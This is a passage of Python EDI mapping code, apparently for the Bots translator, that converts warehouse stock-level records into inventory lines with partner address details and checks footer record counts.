            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'street2': WH_ADD_LINE2})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'city': WH_ADD_LINE3})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'state': WH_ADD_STATE})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'country': WH_ADD_COUNTRY})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'zip': WH_ADD_ZIP})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'phone': WH_ADD_PHONE})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'fax': WH_ADD_FAX})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'vat': WH_ADD_VAT})

        # == STOCK LEVELS - SR8AR ==
        for SL in BODY.get('SR8AR', []):
            rec_counts['8A'] = rec_counts.setdefault('8A', 0) + 1
            SL_PRODUCT = SL.get('Lot_external_reference')
            SL_PRODUCT_ARTICLE = SL.get('Article_reference')
            SL_PRODUCT_CODE = SL.get('Product_code')
            SL_PRODUCT_CODE_TYPE = SL.get('Product_code_qualifier')
            SL_QTY_TOTAL = SL.get('Number_of_units_physical_stock_in_MUS')
            SL_QTY_INCOMING = SL.get('Expected_in')
            SL_QTY_AVAILABLE = SL.get('Physical_stock_available')
            SL_QTY_OUTGOING = SL.get('Expected_out')
            SL_QTY_OUTGOING_AVAILABLE = SL.get('Reserved_sufficient')
            SL_QTY_OUTGOING_FUTURE = SL.get('Reserved_insufficient')
            SL_DATE = SL.get('Date_the_stock_was_determined')
            SL_TIME = SL.get('Time_the_stock_was_determined')
            SL_DATETIME = get_datetime(SL_DATE, SL_TIME)

            sout = lout.putloop({'BOTSID': 'inventory'}, {'BOTSID':'inventory_line'})
            sout.put({'BOTSID':'inventory_line', 'product': SL_PRODUCT})
            sout.put({'BOTSID':'inventory_line', 'product_article_no': SL_PRODUCT_ARTICLE})
            sout.put({'BOTSID':'inventory_line', 'product_other': SL_PRODUCT_CODE})
            sout.put({'BOTSID':'inventory_line', 'product_other_type': SL_PRODUCT_CODE_TYPE})
            #sout.put({'BOTSID':'inventory_line', 'qty_total': SL_QTY_TOTAL}) # This may be in a different UoM from DSV, so do not include it since the other qty fields are mandatory
            sout.put({'BOTSID':'inventory_line', 'qty_incoming': SL_QTY_INCOMING})
            sout.put({'BOTSID':'inventory_line', 'qty_available': SL_QTY_AVAILABLE})
            sout.put({'BOTSID':'inventory_line', 'qty_outgoing': SL_QTY_OUTGOING})
            sout.put({'BOTSID':'inventory_line', 'qty_outgoing_available': SL_QTY_OUTGOING_AVAILABLE})
            sout.put({'BOTSID':'inventory_line', 'qty_outgoing_future': SL_QTY_OUTGOING_FUTURE})
            sout.put({'BOTSID':'inventory_line', 'datetime': SL_DATETIME})

        # == FOOTER - SR99R ==
        for FOOT in BODY.get('SR99R', []):
            rec_counts['99'] = rec_counts.setdefault('99', 0) + 1

        for FOOT in BODY.get('SR99R', []):
            FOOT_REC_TYPE = FOOT.get('RecordType')
            FOOT_REC_COUNT = FOOT.get('Total_Nbrs_of_Rec')
            assert int(rec_counts.get(FOOT_REC_TYPE, 0)) == int(FOOT_REC_COUNT), "Expected %s of record %s, got %s" % (FOOT_REC_COUNT, FOOT_REC_TYPE, rec_counts.get(FOOT_REC_TYPE, 0))
